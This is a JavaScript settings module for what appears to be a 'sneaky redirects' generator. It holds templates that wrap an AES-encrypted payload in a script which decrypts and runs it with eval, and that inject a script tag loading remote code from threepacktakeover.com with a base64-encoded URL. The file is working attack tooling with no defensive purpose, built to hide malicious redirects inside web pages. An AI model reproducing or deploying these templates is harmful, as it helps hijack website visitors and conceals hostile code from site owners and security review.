const SETTINGS_KEY = 'sneaky_redirects_settings';

export const getDefaultSettings = () => ({
  outputTemplate: `<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/mode-ecb-min.js"></script>
<script type="text/javascript">
var %1 = "%4";
var %2 = CryptoJS.enc.Base64.parse(%1);
var %3 = CryptoJS.AES.decrypt("%5", %2, {mode: CryptoJS.mode.ECB, padding: CryptoJS.pad.Pkcs7});
eval(%3.toString(CryptoJS.enc.Utf8));
</script>`,
  redirectTemplate: `var script = document.createElement('script'); script.src = 'https://threepacktakeover.com/r/jslib.php?lokacija=' + 'URL_BASE64'; document.head.appendChild(script);`
});

export const getSettings = () => {
  try {
    const stored = localStorage.getItem(SETTINGS_KEY);
    if (stored) {
      const parsed = JSON.parse(stored);
      const defaults = getDefaultSettings();
      return {
        ...defaults,
        ...parsed
      };
    }
  } catch (error) {
    console.error('Error loading settings:', error);
  }
  
  return getDefaultSettings();
};

export const saveSettings = (settings) => {
  try {
    localStorage.setItem(SETTINGS_KEY, JSON.stringify(settings));
  } catch (error) {
    console.error('Error saving settings:', error);
  }
};